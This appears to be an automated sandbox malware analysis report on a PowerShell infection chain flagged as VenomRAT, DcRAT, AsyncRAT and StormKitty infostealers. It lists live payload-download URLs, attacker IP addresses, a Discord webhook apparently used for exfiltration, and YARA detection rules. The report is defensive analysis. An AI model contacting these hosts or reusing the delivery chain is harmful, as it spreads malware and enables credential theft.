Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131
Source: unknown	TCP traffic detected without corresponding DNS query: 147.45.44.131

Source: global traffic	HTTP traffic detected: GET /wrcaf.ps1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 185.149.146.164Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/file.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/iviewers.dll HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /infopage/iubn.ps1 HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqUser-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: 147.45.44.131Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /infopage/rwvg1.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131
Source: global traffic	HTTP traffic detected: GET /infopage/ersyb.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131

Source: powershell.exe, 00000003.00000002.2177596881.00000169B17AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169B1497000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.000000000506F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131
Source: powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2288952062.0000000008670000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000009.00000003.2208675662.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208452005.00000000052D5000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208523176.00000000052C4000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2209557435.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000002.2210070157.00000000052C6000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000009.00000003.2208576514.00000000052D5000.00000004.00000020.00020000.00000000.sdmp, iacipmps.dll.9.dr, iacipmps.0.cs.8.dr	String found in binary or memory: http://147.45.44.131/infopage/ersyb.exe
Source: csc.exe, 00000009.00000003.2209327326.0000000005571000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/ersyb.exe0W
Source: powershell.exe, 00000003.00000002.2177596881.00000169B11B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/file.exe
Source: powershell.exe, 00000008.00000002.2247878254.00000000047E0000.00000004.00000020.00020000.00000000.sdmp, iviewers.dll.3.dr	String found in binary or memory: http://147.45.44.131/infopage/iubn.ps1
Source: powershell.exe, 00000003.00000002.2177596881.00000169B11B3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/iviewers.dll
Source: powershell.exe, 00000008.00000002.2248203691.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.44.131/infopage/rwvg1.exe
Source: powershell.exe, 00000008.00000002.2248203691.000000000506F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.448JU
Source: powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://147.45.448V
Source: powershell.exe, 00000003.00000002.2177596881.00000169B07F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.149.146.164
Source: powershell.exe, 00000003.00000002.2177596881.00000169AFBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169AFDF3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169B07F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://185.149.146.164/wrcaf.ps1
Source: powershell.exe, 00000008.00000002.2283880375.00000000072F9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.m
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ipinfo.io/ip
Source: powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: powershell.exe, 00000003.00000002.2209534008.00000169BFC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2209534008.00000169BFD73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000000.00000002.2225680546.0000025C4299C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169AFBC1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: Amcache.hve.19.dr	String found in binary or memory: http://upx.sf.net
Source: powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: powershell.exe, 00000000.00000002.2225680546.0000025C42951000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000000.00000002.2225680546.0000025C4296A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2177596881.00000169AFBC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000008.00000002.2248203691.0000000004CB1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discord.com/api/webhooks/1016614786533969920/fMJOOjA1pZqjV8_s0JC86KN9Fa0FeGPEHaEak8WTADC18s5
Source: powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://discordapp.com/api/v6/users/
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004EF7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.0000000004FD8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2248203691.000000000525B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/LimerBoy/StormKitty
Source: powershell.exe, 00000008.00000002.2248203691.0000000004E06000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2177596881.00000169B07F3000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2209534008.00000169BFC31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2209534008.00000169BFD73000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005D19000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354cIt
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_see
Source: powershell.exe, 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://urn.to/r/sds_seeaCould

Key, Mouse, Clipboard, Microphone and Screen Capturing

Yara detected Keylogger Generic

Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR
Source: Yara match	File source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match	File source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR

Source: C:\Windows\Temp\Package.exe

Code function: 5_2_00D390DA OpenClipboard,

5_2_00D390DA

Source: C:\Windows\Temp\Package.exe	Code function: 5_2_00D33450 GlobalAlloc,GlobalLock,StringFromGUID2,wsprintfW,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_00D33450
Source: C:\Windows\Temp\Package.exe	Code function: 5_2_00D32EF0 GlobalAlloc,GlobalLock,StringFromGUID2,GlobalUnlock,EmptyClipboard,SetClipboardData,CloseClipboard,		5_2_00D32EF0

System Summary

Malicious sample detected (through community Yara rule)

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: dump.pcap, type: PCAP	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: dump.pcap, type: PCAP	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.powershell.exe.525bde2.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 8.2.powershell.exe.4f9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 8.2.powershell.exe.503ed84.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 8.2.powershell.exe.503a820.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 8.2.powershell.exe.4f6df4c.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 8.2.powershell.exe.503ed84.1.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 8.2.powershell.exe.4f9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Stealerium based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Finds StormKitty samples (or their variants) based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Find DcRAT samples (qwqdanchun) based on specific strings Author: Sekoia.io
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc. Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing many VPN software clients. Observed in infosteslers Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects StormKitty infostealer Author: ditekSHen
Source: 8.2.powershell.exe.6342ad8.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000008.00000002.2262741450.0000000006342000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_DCRat_1aeea1ac Author: unknown
Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: 00000008.00000002.2262741450.0000000005F62000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects AsyncRAT Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2180, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR	Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR	Matched rule: Detects executables referencing Discord tokens regular expressions Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2276, type: MEMORYSTR	Matched rule: Detects AsyncRAT Author: ditekSHen

.NET source code contains very large strings

Source: 8.2.powershell.exe.8660000.8.raw.unpack, Knvbl.cs	Long String: Length: 14748
Source: 8.2.powershell.exe.4f6df4c.3.raw.unpack, Knvbl.cs	Long String: Length: 14748

Powershell drops PE file

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\iviewers.dll			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\Windows\Temp\Package.exe			Jump to dropped file

Source: C:\Windows\Temp\Package.exe	Code function: 5_2_00D39634	5_2_00D39634
Source: C:\Windows\Temp\Package.exe	Code function: 5_2_6E2FE135	5_2_6E2FE135
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04721D68	8_2_04721D68
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 8_2_04721E6A	8_2_04721E6A

Source: Joe Sandbox View

Dropped File: C:\Windows\Temp\Package.exe A4F53964CDDDCCCBD1B46DA4D3F7F5F4292B5DD11C833D3DB3A1E7DEF36DA69A

Source: C:\Windows\Temp\Package.exe	Code function: String function: 6E2F19E0 appears 35 times
Source: C:\Windows\Temp\Package.exe	Code function: String function: 00D3F3E2 appears 34 times

Source: C:\Windows\Temp\Package.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2972 -s 204

Source: dump.pcap, type: PCAP	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: dump.pcap, type: PCAP	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: dump.pcap, type: PCAP	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.powershell.exe.525bde2.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 8.2.powershell.exe.4f9a7a0.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 8.2.powershell.exe.503ed84.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 8.2.powershell.exe.503a820.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 8.2.powershell.exe.4f6df4c.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 8.2.powershell.exe.503ed84.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 8.2.powershell.exe.4f9a7a0.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_StormKitty author = ditekSHen, description = Detects StormKitty infostealer, clamav_sig = MALWARE.Win.Trojan.StormKitty
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: rat_win_dcrat_qwqdanchun author = Sekoia.io, description = Find DcRAT samples (qwqdanchun) based on specific strings, creation_date = 2023-01-26, classification = TLP:CLEAR, version = 1.0, reference = https://github.com/qwqdanchun/DcRat, id = 8206a410-48b3-425f-9dcb-7a528673a37a
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_B64_Artifacts author = ditekSHen, description = Detects executables embedding bas64-encoded APIs, command lines, registry keys, etc.
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_References_VPN author = ditekSHen, description = Detects executables referencing many VPN software clients. Observed in infosteslers
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
Source: 8.2.powershell.exe.6466862.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_DCRat_1aeea1ac os = windows, severity = x86, creation_date = 2022-01-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.DCRat, fingerprint = fc67d76dc916b7736de783aa245483381a8fe071c533f3761e550af80a873fe9, id = 1aeea1ac-69b9-4cc6-91af-18b7a79f35ce, last_modified = 2022-04-12
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stealerium author = Sekoia.io, description = Detects Stealerium based on specific strings, creation_date = 2022-12-01, classification = TLP:CLEAR, version = 1.0, id = 165c7d3d-de7e-4d71-b94a-8ab4a0e5ddd5
Source: 8.2.powershell.exe.6076822.5.raw.unpack, type: UNPACKEDPE	Matched rule: infostealer_win_stormkitty author = Sekoia.io, description = Finds StormKitty samples (or their variants) based on specific strings, creation_date = 2023-03-29, classification = TLP:CLEAR, version = 1.0, id = 5014d2e5-af5c-4800-ab1e-b57de37a2450
